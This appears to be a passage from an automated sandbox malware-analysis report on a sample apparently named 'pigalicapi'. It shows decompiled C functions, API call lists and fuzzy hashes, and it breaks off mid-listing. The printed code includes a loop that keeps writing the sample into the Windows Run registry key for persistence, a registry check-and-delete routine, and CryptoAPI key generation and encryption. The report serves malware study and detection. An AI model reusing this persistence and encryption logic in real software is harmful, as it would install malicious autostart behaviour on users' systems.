                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 443218420-0
                                                                                                                                                                                                                                                                          • Opcode ID: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                          • Instruction ID: 1c3b7df952a912c4f86c12ad70d9a091debb45511137cc5b62942badbf1a5776
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7021EC75A00208FBEB64DFA4DC49BAE77B5EB48705F108659F615BB2C0C778AA80CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                          				char* _v40;
                                                                                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                          						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                          						if(_v36 != 0) {
                                                                                                                                                                                                                                                                          							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                          					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t69;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                          						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                          							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                          							if(_v40 != 0) {
                                                                                                                                                                                                                                                                          								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                          								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                          								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          								 *_a12 = _v12;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                          							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                          							if(_v44 != 0) {
                                                                                                                                                                                                                                                                          								E04007B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                          								 *_a16 = _v44;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04005b56
                                                                                                                                                                                                                                                                          0x04005b61
                                                                                                                                                                                                                                                                          0x04005b85
                                                                                                                                                                                                                                                                          0x04005b92
                                                                                                                                                                                                                                                                          0x04005b95
                                                                                                                                                                                                                                                                          0x04005b9c
                                                                                                                                                                                                                                                                          0x04005ba3
                                                                                                                                                                                                                                                                          0x04005bbc
                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                          0x04005bcb
                                                                                                                                                                                                                                                                          0x04005bd7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005bde
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                          0x04005be6
                                                                                                                                                                                                                                                                          0x04005bf6
                                                                                                                                                                                                                                                                          0x04005bfc
                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                          0x04005c09
                                                                                                                                                                                                                                                                          0x04005c10
                                                                                                                                                                                                                                                                          0x04005c17
                                                                                                                                                                                                                                                                          0x04005c30
                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                          0x04005c59
                                                                                                                                                                                                                                                                          0x04005c68
                                                                                                                                                                                                                                                                          0x04005c71
                                                                                                                                                                                                                                                                          0x04005c7a
                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                          0x04005ca4
                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                          0x04005cb9
                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                          0x04005ccf

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B7F
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B8C
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005BB6
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005BF6
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005C2A
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04005C59
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005C9E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 808621155-0
                                                                                                                                                                                                                                                                          • Opcode ID: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                          • Instruction ID: 5a59fe48962482dc997a37d5c0ed7d0013e253906576cb4b19edba68c8a08fb2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D451C774904209EFEB04CF94C998BEEBBB5EF48305F148559E505B7284D379AA80CFA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04006CF0() {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                                                                          				char* _t32;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                          				_t32 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                          				if(_t21 == 0) {
                                                                                                                                                                                                                                                                          					_v24 = 0x20;
                                                                                                                                                                                                                                                                          					_v20 = 3;
                                                                                                                                                                                                                                                                          					_t30 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                          					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                          					_v28 = _t24;
                                                                                                                                                                                                                                                                          					if(_v28 == 0) {
                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                          						_t26 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                          						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v16);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04006cf6
                                                                                                                                                                                                                                                                          0x04006cfa
                                                                                                                                                                                                                                                                          0x04006d0a
                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                          0x04006d13
                                                                                                                                                                                                                                                                          0x04006d25
                                                                                                                                                                                                                                                                          0x04006d30
                                                                                                                                                                                                                                                                          0x04006d38
                                                                                                                                                                                                                                                                          0x04006d3a
                                                                                                                                                                                                                                                                          0x04006d41
                                                                                                                                                                                                                                                                          0x04006d56
                                                                                                                                                                                                                                                                          0x04006d61
                                                                                                                                                                                                                                                                          0x04006d67
                                                                                                                                                                                                                                                                          0x04006d6e
                                                                                                                                                                                                                                                                          0x04006d70
                                                                                                                                                                                                                                                                          0x04006d74
                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                          0x04006d94

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                          • Instruction ID: 88112219bc8656018e8fd12fe99521312711d887651bf4d09d45951e100356d5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE114275D04208AFEB04DFE0D848BBEBBB8FB48304F148158EA00BB280D77D5A45CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                          				intOrPtr* _v56;
                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v16 = _t79;
                                                                                                                                                                                                                                                                          					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t80;
                                                                                                                                                                                                                                                                          					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                          						_v24 = 0x1000;
                                                                                                                                                                                                                                                                          						_v20 = 0x1000;
                                                                                                                                                                                                                                                                          						_t85 = E04008800(_v16,  &_v24, _v12,  &_v20, 0x4013378, 0x94); // executed
                                                                                                                                                                                                                                                                          						if(_t85 != 0) {
                                                                                                                                                                                                                                                                          							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                          							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                          							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                          							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                          								_v40 = E04008770(_t170, 0xa);
                                                                                                                                                                                                                                                                          								_v36 = E040087D0(0xffffffff);
                                                                                                                                                                                                                                                                          								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          								_v32 = _t90;
                                                                                                                                                                                                                                                                          								if(_v32 != 0) {
                                                                                                                                                                                                                                                                          									_v44 = _a8;
                                                                                                                                                                                                                                                                          									E04007B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                          									_t94 = E04008970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                          									if(_t94 != 0) {
                                                                                                                                                                                                                                                                          										_v48 = _a12;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                          										_v60 = 0;
                                                                                                                                                                                                                                                                          										_v56 = _v48;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                          										_v52 = _v48;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                          										E04008650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                          										 *_v56 = E040016F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                          										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                          0x04008376
                                                                                                                                                                                                                                                                          0x04008381
                                                                                                                                                                                                                                                                          0x040085c0
                                                                                                                                                                                                                                                                          0x040085c6
                                                                                                                                                                                                                                                                          0x040083b1
                                                                                                                                                                                                                                                                          0x040083bf
                                                                                                                                                                                                                                                                          0x040083c5
                                                                                                                                                                                                                                                                          0x040083d6
                                                                                                                                                                                                                                                                          0x040083dc
                                                                                                                                                                                                                                                                          0x040083e3
                                                                                                                                                                                                                                                                          0x040083f3
                                                                                                                                                                                                                                                                          0x040083fa
                                                                                                                                                                                                                                                                          0x0400841b
                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                          0x04008431
                                                                                                                                                                                                                                                                          0x04008435
                                                                                                                                                                                                                                                                          0x0400843b
                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                          0x0400844e
                                                                                                                                                                                                                                                                          0x0400845b
                                                                                                                                                                                                                                                                          0x0400846b
                                                                                                                                                                                                                                                                          0x04008471
                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                          0x04008481
                                                                                                                                                                                                                                                                          0x04008490
                                                                                                                                                                                                                                                                          0x040084a8
                                                                                                                                                                                                                                                                          0x040084b2
                                                                                                                                                                                                                                                                          0x040084bb
                                                                                                                                                                                                                                                                          0x040084c8
                                                                                                                                                                                                                                                                          0x040084da
                                                                                                                                                                                                                                                                          0x040084e2
                                                                                                                                                                                                                                                                          0x040084ec
                                                                                                                                                                                                                                                                          0x040084f9
                                                                                                                                                                                                                                                                          0x04008504
                                                                                                                                                                                                                                                                          0x04008511
                                                                                                                                                                                                                                                                          0x04008525
                                                                                                                                                                                                                                                                          0x0400853c
                                                                                                                                                                                                                                                                          0x04008550
                                                                                                                                                                                                                                                                          0x04008576
                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                          0x04008596
                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                          0x040085ad
                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040085ad

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083BF
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083D6
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400846B
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400858C
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085A3
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085BA
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                            • Part of subcall function 040087D0: QueryPerformanceCounter.KERNEL32(?), ref: 040087E7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 487564122-0
                                                                                                                                                                                                                                                                          • Opcode ID: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                          • Instruction ID: 75e4ec9ffd75ad85335d37f2dbfda6536f989acb89096578b4a6032df118288e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0711CB6D00208ABEB14EFA4D845FEEB7B4BB48305F14C519EA15B72C0E774EA44CB65
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040012D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				CHAR* _v8;
                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                          				CHAR* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                          					_v16 = _v8;
                                                                                                                                                                                                                                                                          					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                          					while( *0x4014370 == 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                          						if(_t26 == 0) {
                                                                                                                                                                                                                                                                          							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                          							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                          							RegCloseKey(_v24); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                          0x040012d9
                                                                                                                                                                                                                                                                          0x040012e0
                                                                                                                                                                                                                                                                          0x040012e9
                                                                                                                                                                                                                                                                          0x040012ec
                                                                                                                                                                                                                                                                          0x040012f3
                                                                                                                                                                                                                                                                          0x04001301
                                                                                                                                                                                                                                                                          0x04001314
                                                                                                                                                                                                                                                                          0x04001316
